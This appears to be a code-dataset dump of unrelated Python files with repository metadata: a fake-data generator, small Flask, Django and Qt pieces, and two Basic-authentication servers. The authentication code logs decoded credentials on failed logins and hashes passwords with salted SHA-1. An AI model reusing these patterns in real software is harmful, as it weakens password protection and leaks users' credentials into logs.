self.email = fake.company_email()
self.firstName = fake.first_name()
self.lastName = fake.last_name()
self.dateOfBirth = fake.iso8601()
self.password = "Password123"
self.prefix = random.choice(['Mr.', 'Mrs.', 'Ms.', 'Dr.'])
self.gender = random.choice(['Male', 'Female'])
self.group = 'coordinator'
class Study:
def __init__(self, id):
self.id = id
self.name = 'STUDY-' + `id` + '-' + fake.word().upper()
self.attributes = {}
self.attributes['procedure'] = fake.words()
self.attributes['area'] = ['BOTH', 'LEFT', 'RIGHT']
self.reb = fake.country_code() + '-' + `random.randint(100, 999)`
self.administrator = random.randint(config.minCoord, config.maxCoord - 1)
self.pi = random.randint(config.minCoord, config.maxCoord - 1)
class CollectionCentre:
def __init__(self, id, study):
self.id = id
self.name = 'CC-' + `id` + '-' + fake.city()
self.study = study.id
self.contact = random.randint(config.minCoord, config.maxCoord - 1)
class UserEnrollment:
def __init__(self, id, centreID):
self.collectionCentre = centreID
self.user = random.randint(config.minCoord, config.maxCoord - 1)
self.centreAccess = random.choice(['coordinator', 'interviewer'])
class SubjectEnrollment:
def __init__(self, id, study, centreID):
# subject user info
self.username = fake.user_name()
self.email = fake.company_email()
self.firstname = fake.first_name()
self.lastname = fake.last_name()
self.dob = fake.iso8601()
self.password = "Password123"
self.prefix = random.choice(['Mr.', 'Mrs.', 'Ms.', 'Dr.'])
self.gender = random.choice(['Male', 'Female'])
# subject enrollment info
self.study = study.id
self.collectionCentre = centreID
self.doe = fake.iso8601()
self.studyMapping = {}
for key, values in study.attributes.iteritems():
self.studyMapping[key] = random.choice(values)
self.status = random.choice([
'REGISTERED',
'ONGOING',
'LOST TO FOLLOWUP',
'WITHDRAWN',
'INELIGIBLE',
'DECEASED',
'TERMINATED',
'COMPLETED'
])
| 31.246575 | 77 | 0.644454 | 265 | 2,281 | 5.437736 | 0.335849 | 0.058293 | 0.038168 | 0.036086 | 0.48161 | 0.406662 | 0.406662 | 0.406662 | 0.277585 | 0.277585 | 0 | 0.015317 | 0.198597 | 2,281 | 72 | 78 | 31.680556 | 0.772976 | 0.017975 | 0 | 0.258065 | 0 | 0 | 0.097452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.032258 | 0.048387 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cba3386606abea1e2c3dfe0f137338d796e10c89 | 539 | py | Python | batuta/base.py | makecodes/batuta | b460bdb216e0d9486dacab3273b891d7515287c3 | [
"Unlicense"
] | null | null | null | batuta/base.py | makecodes/batuta | b460bdb216e0d9486dacab3273b891d7515287c3 | [
"Unlicense"
] | 2 | 2022-01-22T15:17:15.000Z | 2022-01-22T16:08:27.000Z | batuta/base.py | makecodes/batuta | b460bdb216e0d9486dacab3273b891d7515287c3 | [
"Unlicense"
] | null | null | null | from dynaconf import FlaskDynaconf
from flask import Flask
def create_app(**config):
app = Flask(__name__)
FlaskDynaconf(app) # config managed by Dynaconf
app.config.load_extensions('EXTENSIONS') # Load extensions from settings.toml
app.config.update(config) # Override with passed config
return app
def create_app_wsgi():
# workaround for Flask issue
# that doesn't allow **config
# to be passed to create_app
# https://github.com/pallets/flask/issues/4170
app = create_app()
return app
| 26.95 | 82 | 0.714286 | 72 | 539 | 5.208333 | 0.513889 | 0.096 | 0.064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009302 | 0.202226 | 539 | 19 | 83 | 28.368421 | 0.862791 | 0.400742 | 0 | 0.181818 | 0 | 0 | 0.031746 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.181818 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
cbaf10d4a0aa43c5e434d348b34679078fdc57a8 | 1,475 | py | Python | python/euler002/euler002.py | marvins/ProjectEuler | 55a377bb9702067bac6908c1316c578498402668 | [
"MIT"
] | null | null | null | python/euler002/euler002.py | marvins/ProjectEuler | 55a377bb9702067bac6908c1316c578498402668 | [
"MIT"
] | null | null | null | python/euler002/euler002.py | marvins/ProjectEuler | 55a377bb9702067bac6908c1316c578498402668 | [
"MIT"
] | 1 | 2020-12-16T09:25:19.000Z | 2020-12-16T09:25:19.000Z | #!/usr/bin/env python
#---------------------------------#
#- Fibonacci Lookup Table -#
#---------------------------------#
fib_table = {0:0, 1:1, 2:1, 3:2}
#---------------------------------#
#- Compute Fibonacci Value -#
#---------------------------------#
def Fibonacci( F ):
# Check exit
if F < 2:
return F
# Check for item already answered
if F in fib_table:
return fib_table[F]
# Otherwise, update the table
fib_table[F] = Fibonacci(F-1) + Fibonacci(F-2)
# Return
return fib_table[F]
#----------------------------------#
#- Find Max Fibonacci Value -#
#----------------------------------#
def Find_Max_Fibonacci( max_value ):
# Iterate until you hit the max
counter = 2
Fmax = counter
while True:
# Update Fmax
Fmax = counter-1
# Check Fibonacci
if Fibonacci(counter) >= max_value:
return Fmax
# Increment
counter += 1
#--------------------------#
#- Main Function -#
#--------------------------#
def main():
# Max value
max_value = 4000000
# Find the Max Fib Number
Fmax = Find_Max_Fibonacci(max_value)
# Iterate
result = 0
for x in xrange(0,Fmax+1):
# Compute value
value = Fibonacci(x)
# Check if even
if value % 2 == 0:
result += value
print result
if __name__ == '__main__':
main()
| 19.666667 | 50 | 0.44 | 151 | 1,475 | 4.15894 | 0.324503 | 0.063694 | 0.042994 | 0.047771 | 0.098726 | 0.098726 | 0 | 0 | 0 | 0 | 0 | 0.025341 | 0.304407 | 1,475 | 74 | 51 | 19.932432 | 0.586745 | 0.425085 | 0 | 0.074074 | 0 | 0 | 0.009901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cbb30457af6425432e38e401ec2a806f28ae68ab | 6,968 | py | Python | SimpleHTTPSAuthServer.py | oza6ut0ne/SimpleHTTPSAuthServer | 084e5c0cb686e8c41ba1f911a6bc8939f2e24a59 | [
"MIT"
] | null | null | null | SimpleHTTPSAuthServer.py | oza6ut0ne/SimpleHTTPSAuthServer | 084e5c0cb686e8c41ba1f911a6bc8939f2e24a59 | [
"MIT"
] | null | null | null | SimpleHTTPSAuthServer.py | oza6ut0ne/SimpleHTTPSAuthServer | 084e5c0cb686e8c41ba1f911a6bc8939f2e24a59 | [
"MIT"
] | null | null | null | import base64
import os
import random
import re
import socket
import sys
import ssl
import string
if sys.version_info[0] == 2:
from BaseHTTPServer import HTTPServer as Server
from SimpleHTTPServer import SimpleHTTPRequestHandler as Handler
from SocketServer import ThreadingMixIn
from httplib import UNAUTHORIZED
from itertools import izip_longest as zip_longest
elif sys.version_info[0] == 3:
from http.server import HTTPServer as Server
from http.server import SimpleHTTPRequestHandler as Handler
from socketserver import ThreadingMixIn
from http.client import UNAUTHORIZED
from itertools import zip_longest
ENV_USERS = 'SIMPLE_HTTPS_USERS'
ENV_PASSWORDS = 'SIMPLE_HTTPS_PASSWORDS'
ENV_KEYS = 'SIMPLE_HTTPS_KEYS'
class AuthHandler(Handler):
def send_auth_request(self):
self.send_response(UNAUTHORIZED)
self.send_header('WWW-Authenticate', 'Basic realm=\"Authorization Required\"')
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
if not self.server.keys:
if __name__ == '__main__':
Handler.do_GET(self)
return True
auth_header = self.headers.get('Authorization')
if auth_header is None:
self.send_auth_request()
self.wfile.write('<h1>Authorization Required</h1>'.encode())
print('no auth header received')
return False
elif auth_header[len('Basic '):] in self.server.keys:
if __name__ == '__main__':
Handler.do_GET(self)
return True
else:
self.send_auth_request()
self.wfile.write('<h1>Authorization Required</h1>'.encode())
auth = re.sub('^Basic ', '', auth_header)
print('Authentication failed! %s' % base64.b64decode(auth).decode())
return False
def super_get(self):
Handler.do_GET(self)
class HTTPSAuthServer(Server):
def __init__(self, server_address, RequestHandlerClass=AuthHandler,
bind_and_activate=True):
Server.__init__(
self, server_address, RequestHandlerClass, bind_and_activate)
self.keys = []
self.servercert = None
self.cacert = None
self.protocol = 'HTTP'
self.certreqs = ssl.CERT_NONE
def set_auth(self, users=None, passwords=None, keys=None):
if not (users or passwords or keys):
self.keys = []
return
if keys is not None:
self.keys += keys
if users is not None or passwords is not None:
accounts = zip_longest(
users or [''], passwords or [''], fillvalue=''
)
for user, password in accounts:
self.keys.append(
base64.b64encode((user + ':' + password).encode()).decode()
)
def set_certs(self, servercert=None, cacert=None):
self.servercert = servercert
self.cacert = cacert
if servercert is not None:
self.protocol = 'HTTPS'
if cacert is not None:
self.certreqs = ssl.CERT_REQUIRED
self.socket = ssl.wrap_socket(self.socket, certfile=servercert,
server_side=True,
cert_reqs=self.certreqs,
ca_certs=self.cacert)
def server_bind(self):
try:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except:
pass
return Server.server_bind(self)
def serve_forever(self, poll_interval=0.5):
if self.servercert is None:
print('No server certificate is specified. HTTPS is disabled.')
elif self.cacert is not None:
print('CA certificate is specified. '
'Cilent certificate authentication is enabled.')
sockname = self.socket.getsockname()
print('Serving {} on {} port {} ...'.format(
self.protocol, sockname[0], sockname[1])
)
try:
Server.serve_forever(self, poll_interval)
except KeyboardInterrupt:
pass
class ThreadedHTTPSAuthServer(ThreadingMixIn, HTTPSAuthServer):
daemon_threads = True
def serve_https(bind=None, port=8000, users=None, passwords=None, keys=None,
servercert=None, cacert=None, threaded=False,
HandlerClass=AuthHandler):
if threaded:
ServerClass = ThreadedHTTPSAuthServer
else:
ServerClass = HTTPSAuthServer
addrinfo = socket.getaddrinfo(
bind, port, 0, socket.SOCK_STREAM, 0, socket.AI_PASSIVE)[0]
ServerClass.address_family = addrinfo[0]
addr = addrinfo[4]
server = ServerClass(addr, HandlerClass)
server.set_auth(users, passwords, keys)
server.set_certs(servercert, cacert)
server.serve_forever()
def random_string(length):
return ''.join([random.choice(
string.ascii_letters +
string.digits +
string.punctuation) for i in range(length)])
def split_or_none(val):
if val is None:
return None
return val.split(' ')
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description='An HTTPS server with Basic authentication '
'and client certificate authentication',
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('port', nargs='?', type=int, default=8000)
parser.add_argument('-b', '--bind', metavar='ADDRESS')
parser.add_argument('-t', '--threaded', action='store_true')
parser.add_argument('-u', '--users', nargs='*',
default=split_or_none(os.getenv(ENV_USERS)))
parser.add_argument('-p', '--passwords', nargs='*',
default=split_or_none(os.getenv(ENV_PASSWORDS)))
parser.add_argument('-k', '--keys', nargs='*',
default=split_or_none(os.getenv(ENV_KEYS)))
parser.add_argument('-r', '--random', type=int)
parser.add_argument('-s', '--servercert')
parser.add_argument('-c', '--cacert')
parser.add_argument('-d', '--docroot')
args = parser.parse_args()
if args.servercert is not None:
args.servercert = os.path.abspath(args.servercert)
if args.cacert is not None:
args.cacert = os.path.abspath(args.cacert)
if args.docroot is not None:
print('Set docroot to %s' % args.docroot)
os.chdir(args.docroot)
if args.random is not None:
args.users = [random_string(args.random)]
args.passwords = [random_string(args.random)]
print('Generated username and password -> {} : {}'.format(
args.users[0], args.passwords[0])
)
serve_https(args.bind, args.port, args.users, args.passwords,
args.keys, args.servercert, args.cacert, args.threaded)
| 33.5 | 86 | 0.617681 | 784 | 6,968 | 5.330357 | 0.256378 | 0.011965 | 0.021536 | 0.01364 | 0.194783 | 0.131132 | 0.116774 | 0.116774 | 0.092367 | 0.054559 | 0 | 0.008146 | 0.277698 | 6,968 | 207 | 87 | 33.661836 | 0.822174 | 0 | 0 | 0.130952 | 0 | 0 | 0.102899 | 0.006171 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065476 | false | 0.107143 | 0.113095 | 0.005952 | 0.255952 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
cbb79607ab88cfb6b0f8cd6f2a609f20a5508f65 | 867 | py | Python | app/helpers.py | QwertygidQ/phystech-backend | 657a5862d3bab91623551c7f4f6868cfdb1df4b8 | [
"MIT"
] | null | null | null | app/helpers.py | QwertygidQ/phystech-backend | 657a5862d3bab91623551c7f4f6868cfdb1df4b8 | [
"MIT"
] | null | null | null | app/helpers.py | QwertygidQ/phystech-backend | 657a5862d3bab91623551c7f4f6868cfdb1df4b8 | [
"MIT"
] | null | null | null | from flask import request, jsonify
from functools import wraps
from schema import SchemaError
def json_required(func):
@wraps(func)
def wrapper(*args, **kwargs):
if not request.data or not request.json:
return jsonify({
'status': 'Error',
'reason': 'No JSON provided'
})
return func(*args, **kwargs)
return wrapper
def validate_schema(schema):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
schema.validate(request.json)
except SchemaError:
return jsonify({
'status': 'Error',
'reason': 'Invalid JSON provided'
})
return func(*args, **kwargs)
return wrapper
return decorator | 25.5 | 53 | 0.517878 | 81 | 867 | 5.518519 | 0.382716 | 0.089485 | 0.058166 | 0.071588 | 0.483221 | 0.348993 | 0.348993 | 0.201342 | 0 | 0 | 0 | 0 | 0.388697 | 867 | 34 | 54 | 25.5 | 0.843396 | 0 | 0 | 0.518519 | 0 | 0 | 0.081797 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.185185 | false | 0 | 0.111111 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
cbbf46aa2d552297fb3fb4b62e94db053b8ce1eb | 1,581 | py | Python | basic_auth/handler.py | andrei-shabanski/s3pypi | 48718149cf43d6e3252712d072d5b0de850bac55 | [
"MIT"
] | 249 | 2016-04-07T08:36:44.000Z | 2021-06-03T06:55:08.000Z | basic_auth/handler.py | andrei-shabanski/s3pypi | 48718149cf43d6e3252712d072d5b0de850bac55 | [
"MIT"
] | 58 | 2016-06-08T22:41:18.000Z | 2021-05-28T20:03:39.000Z | basic_auth/handler.py | AstrocyteResearch/s3pypi | cd8d02015772dcded3b3db1a588c89e174d10471 | [
"MIT"
] | 100 | 2016-06-23T23:28:23.000Z | 2021-03-12T15:09:29.000Z | import base64
import hashlib
import json
import logging
from dataclasses import dataclass
import boto3
log = logging.getLogger()
region = "us-east-1"
def handle(event: dict, context):
request = event["Records"][0]["cf"]["request"]
try:
authenticate(request["headers"])
except Exception as e:
log.error(repr(e))
return unauthorized
return request
def authenticate(headers: dict):
domain = headers["host"][0]["value"]
auth = headers["authorization"][0]["value"]
auth_type, creds = auth.split(" ")
if auth_type != "Basic":
raise ValueError("Invalid auth type: " + auth_type)
username, password = base64.b64decode(creds).decode().split(":")
user = get_user(domain, username)
if hash_password(password, user.password_salt) != user.password_hash:
raise ValueError("Invalid password for " + username)
@dataclass
class User:
username: str
password_hash: str
password_salt: str
def get_user(domain: str, username: str) -> User:
data = boto3.client("ssm", region_name=region).get_parameter(
Name=f"/s3pypi/{domain}/users/{username}",
WithDecryption=True,
)["Parameter"]["Value"]
return User(username, **json.loads(data))
def hash_password(password: str, salt: str) -> str:
return hashlib.sha1((password + salt).encode()).hexdigest()
unauthorized = dict(
status="401",
statusDescription="Unauthorized",
headers={
"www-authenticate": [
{"key": "WWW-Authenticate", "value": 'Basic realm="Login"'}
]
},
)
| 23.597015 | 73 | 0.648956 | 181 | 1,581 | 5.596685 | 0.441989 | 0.031589 | 0.019743 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013546 | 0.206199 | 1,581 | 66 | 74 | 23.954545 | 0.793626 | 0 | 0 | 0 | 0 | 0 | 0.145478 | 0.020873 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0.145833 | 0.125 | 0.020833 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
cbc875e1529c951ebc046e3930e392b9612e4907 | 1,302 | py | Python | study/hfppnetwork/hfppnetwork/sms/logginghelper.py | NASA-Tournament-Lab/CoECI-CMS-Healthcare-Fraud-Prevention | 4facd935920e77239c25323ca7e233cb899ba9f5 | [
"Apache-2.0"
] | 7 | 2015-07-15T06:47:16.000Z | 2020-10-17T20:51:09.000Z | study/hfppnetwork/hfppnetwork/sms/logginghelper.py | NASA-Tournament-Lab/CoECI-CMS-Healthcare-Fraud-Prevention | 4facd935920e77239c25323ca7e233cb899ba9f5 | [
"Apache-2.0"
] | null | null | null | study/hfppnetwork/hfppnetwork/sms/logginghelper.py | NASA-Tournament-Lab/CoECI-CMS-Healthcare-Fraud-Prevention | 4facd935920e77239c25323ca7e233cb899ba9f5 | [
"Apache-2.0"
] | 8 | 2017-01-30T02:27:01.000Z | 2021-04-21T04:15:48.000Z | # -*- coding: utf-8 -*-
"""
Copyright (C) 2013 TopCoder Inc., All Rights Reserved.
This is the module that defines logging helper methods
This module resides in Python source file logginghelper.py
Thread Safety:
It is thread safe because no module-level variable is used.
@author: TCSASSEMBLER
@version: 1.0
"""
import logging
def method_enter(logger, signature, params=None):
"""
This function is used to logging when enter method .
@param signature the method signature
@param params the method params
"""
logger.debug('Entering method %s', signature)
logger.debug('Input parameters:[%s]',('' if params is None else params))
def method_exit(logger, signature, ret=None):
"""
This function is used to logging when exit method.
@param signature the method signature
@param ret the method return value
"""
logger.debug('Exiting method %s', signature)
logger.debug('Output parameters:%s',ret)
def method_error(logger, signature, details):
"""
This function is used to logging when error happen.
@param signature the method signature
@param details the error details
"""
logger.error('Error in method %s', signature)
logger.error('Details:%s',details)
#log error stack
logger.exception('') | 31.756098 | 76 | 0.69278 | 173 | 1,302 | 5.196532 | 0.416185 | 0.050056 | 0.046719 | 0.060067 | 0.309232 | 0.249166 | 0.208009 | 0.077864 | 0 | 0 | 0 | 0.006783 | 0.207373 | 1,302 | 41 | 77 | 31.756098 | 0.864341 | 0.529186 | 0 | 0 | 0 | 0 | 0.202703 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cbca5e82b89e8b333ac4997324a7acc5ec0553d9 | 2,566 | py | Python | hw8/next_permutation.py | alexander-paskal/ece143-hw | 9e3d475cb44fd16f87879cb74dc9305d70805355 | [
"MIT"
] | 1 | 2022-02-02T07:30:20.000Z | 2022-02-02T07:30:20.000Z | hw8/next_permutation.py | alexander-paskal/ece143-hw | 9e3d475cb44fd16f87879cb74dc9305d70805355 | [
"MIT"
] | null | null | null | hw8/next_permutation.py | alexander-paskal/ece143-hw | 9e3d475cb44fd16f87879cb74dc9305d70805355 | [
"MIT"
] | null | null | null | """
Given a permutation of any length, generate the next permutation in lexicographic order.
For example, this are the permutations for [1,2,3] in lexicographic order.
# >>> list(it.permutations([1,2,3]))
[(1, 2, 3), (1, 3, 2), (2, 1, 3), (2, 3, 1), (3, 1, 2), (3, 2, 1)]
Then, your function next_permutation(t:tuple)->tuple should do the following
# >>> next_permutation((2,3,1))
(3,1,2)
Because (3,1,2) is the next permutation in lexicographic order. Here is another example:
# >>> next_permutation((0, 5, 2, 1, 4, 7, 3, 6))
(0, 5, 2, 1, 4, 7, 6, 3)
Your function should work for very long input tuples so the autograder will time-out if you
try to brute force your solution. The last permutation should wrap aruond to the first.
# >>> next_permutation((3,2,1,0))
(0, 1, 2, 3)
"""
def next_permutation(t: tuple) -> tuple:
"""
Prints the permutation of the input element t immediately following t in lexicographic order
:param t:
:return:
"""
assert isinstance(t, tuple)
for elem in t:
assert isinstance(elem, int)
assert len(t) == len(set(t))
RIGHT = -1
LEFT = RIGHT - 1
left = t[LEFT]
right = t[RIGHT]
while True:
if left < right:
if RIGHT == -1: # if first two:
l = list()
l.extend(t[:LEFT])
l.append(t[RIGHT])
l.append(t[LEFT])
return tuple(l)
else:
# pick the second highest, that's left
# add the rest of the elements in sorted order
l = list()
l.extend(t[:LEFT])
remaining = sorted(t[LEFT:])
second_highest = remaining.pop(remaining.index(left) + 1)
l.append(second_highest)
l.extend(sorted(remaining))
return tuple(l)
else: # left > right
try:
RIGHT -= 1
LEFT = RIGHT - 1
left = t[LEFT]
right = t[RIGHT]
except IndexError: # fully reversed list, return start condition
return tuple(sorted(t))
if __name__ == '__main__':
from itertools import permutations
##### Arguments
p = (1,2,3,4,5)
##### End Arguments
ps = permutations(p)
print("Start permutation:", p)
print("\nExpected | Actual | Matching")
print("-"*20)
for i in range(10):
p_n = next(ps)
print(p, p_n, p==p_n)
p = next_permutation(p)
| 27.591398 | 96 | 0.537412 | 347 | 2,566 | 3.919308 | 0.337176 | 0.088235 | 0.013235 | 0.008824 | 0.189706 | 0.151471 | 0.052941 | 0.052941 | 0.052941 | 0.052941 | 0 | 0.042478 | 0.339439 | 2,566 | 92 | 97 | 27.891304 | 0.759882 | 0.420109 | 0 | 0.318182 | 1 | 0 | 0.039528 | 0 | 0 | 0 | 0 | 0 | 0.068182 | 1 | 0.022727 | false | 0 | 0.022727 | 0 | 0.113636 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cbcfd99b4f40fab95fa519c4f1885786acde8bae | 2,373 | py | Python | sylwek/data_provider.py | fizykpl/Synerise2 | baf755004d62b3d14a0988bbe8a5add15f10d066 | [
"MIT"
] | null | null | null | sylwek/data_provider.py | fizykpl/Synerise2 | baf755004d62b3d14a0988bbe8a5add15f10d066 | [
"MIT"
] | null | null | null | sylwek/data_provider.py | fizykpl/Synerise2 | baf755004d62b3d14a0988bbe8a5add15f10d066 | [
"MIT"
] | null | null | null | import time
import numpy as np
from matplotlib import pyplot as plt
from sylwek.similarity_measure import SimilarityMeasure
from utils import mnist_reader
class DataProvider:
images = {}
labels = {}
similarity_measure = None
next_id = -1 #TODO 2. Prosimy nadać każdemu obrazkowi unikalny identyfikator `image_id` (np. indeks z tablicy)
def __init__(self):
print("Init: Data Provider.")
self.similarity_measure = SimilarityMeasure(self.images)
# load data
X_train, y_train = mnist_reader.load_mnist('../data/fashion', kind='train')
X_test, y_test = mnist_reader.load_mnist('../data/fashion', kind='t10k')
# Add images and labels
self.add_image(X_train,y_train)
self.add_image(X_test,y_test)
def get_image(self,image_id):
if image_id in self.images:
return self.images[image_id]
else:
return None
def add_image(self, images,labels):
if not len(images) == len(labels):
print("Images and labels must be the same size")
print(" System Exit -1")
exit(-1)
for index,image in enumerate(images):
id = self._next_id()
self.images[id] = image
self.add_label(id, labels[index])
def add_label(self,id,label):
if label in self.labels:
self.labels[label].append(id)
else:
self.labels[label] = []
self.labels[label].append(id)
def _next_id(self):
"""
2. Prosimy nadać każdemu obrazkowi unikalny identyfikator `image_id` (np. indeks z tablicy)
:return: next id
"""
self.next_id += 1
return self.next_id
def show_image(self,image_id):
"""
3. Prosimy potraktować obrazki jako 784 (28x28) elementowy wektor
:param image_id: id of image
"""
data = self.images[image_id]
data = np.resize(data, (28, 28))
plt.imshow(data)
plt.show()
if __name__ == "__main__":
dp = DataProvider()
exetime = int(round(time.time() * 1000))
id = 50
mi = dp.similarity_measure.most_similar(id, 3)
exetime = int(round(time.time() * 1000)) - exetime
print("total time {}[ms]".format( exetime))
print(mi)
# Show
dp.show_image(id)
for id in mi:
dp.show_image(id)
| 28.939024 | 115 | 0.604298 | 310 | 2,373 | 4.451613 | 0.319355 | 0.050725 | 0.021739 | 0.028986 | 0.228986 | 0.195652 | 0.156522 | 0.105797 | 0.105797 | 0.105797 | 0 | 0.018311 | 0.286557 | 2,373 | 81 | 116 | 29.296296 | 0.79681 | 0.142014 | 0 | 0.107143 | 0 | 0 | 0.070086 | 0 | 0 | 0 | 0 | 0.012346 | 0 | 1 | 0.107143 | false | 0 | 0.089286 | 0 | 0.339286 | 0.089286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
cbdf9ff14b79b043642bf4e92833f21eebe9c6f0 | 621 | py | Python | build_automation/content_management/migrations/0046_auto_20200228_1432.py | SolarSPELL-Main/DLMS | 7e799246c55f5a64fa236567c411d1c2a2c4f38f | [
"MIT"
] | null | null | null | build_automation/content_management/migrations/0046_auto_20200228_1432.py | SolarSPELL-Main/DLMS | 7e799246c55f5a64fa236567c411d1c2a2c4f38f | [
"MIT"
] | 9 | 2020-01-15T21:33:16.000Z | 2021-06-10T22:13:28.000Z | build_automation/content_management/migrations/0046_auto_20200228_1432.py | SolarSPELL-Main/DLMS | 7e799246c55f5a64fa236567c411d1c2a2c4f38f | [
"MIT"
] | 3 | 2019-11-16T03:54:48.000Z | 2021-09-10T18:53:20.000Z | # Generated by Django 2.1.3 on 2020-02-28 21:32
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('content_management', '0045_auto_20200228_1345'),
]
operations = [
migrations.RemoveField(
model_name='content',
name='collections',
),
migrations.AddField(
model_name='content',
name='collection',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='content_management.Collection'),
),
]
| 25.875 | 129 | 0.63124 | 66 | 621 | 5.80303 | 0.621212 | 0.062663 | 0.073107 | 0.114883 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0671 | 0.256039 | 621 | 23 | 130 | 27 | 0.761905 | 0.072464 | 0 | 0.235294 | 1 | 0 | 0.182927 | 0.090592 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1db107f2c1e2018df51dd16f8e25f706a3117779 | 7,945 | py | Python | PyFlow/UI/Widgets/GraphEditor_ui.py | dlario/PyFlow | b53b9d14b37aa586426d85842c6cd9a9c35443f2 | [
"MIT"
] | null | null | null | PyFlow/UI/Widgets/GraphEditor_ui.py | dlario/PyFlow | b53b9d14b37aa586426d85842c6cd9a9c35443f2 | [
"MIT"
] | null | null | null | PyFlow/UI/Widgets/GraphEditor_ui.py | dlario/PyFlow | b53b9d14b37aa586426d85842c6cd9a9c35443f2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'e:/GIT/PyFlow/PyFlow/UI/Widgets\GraphEditor_ui.ui',
# licensing of 'e:/GIT/PyFlow/PyFlow/UI/Widgets\GraphEditor_ui.ui' applies.
#
# Created: Sat May 4 12:25:24 2019
# by: pyside2-uic running on PySide2 5.12.0
#
# WARNING! All changes made in this file will be lost!
from Qt import QtCompat, QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setEnabled(True)
MainWindow.resize(863, 543)
MainWindow.setDocumentMode(True)
MainWindow.setDockNestingEnabled(True)
MainWindow.setDockOptions(QtWidgets.QMainWindow.AllowNestedDocks|QtWidgets.QMainWindow.AllowTabbedDocks|QtWidgets.QMainWindow.AnimatedDocks)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.centralwidget.setObjectName("centralwidget")
self.gridLayout_3 = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout_3.setContentsMargins(1, 1, 1, 1)
self.gridLayout_3.setObjectName("gridLayout_3")
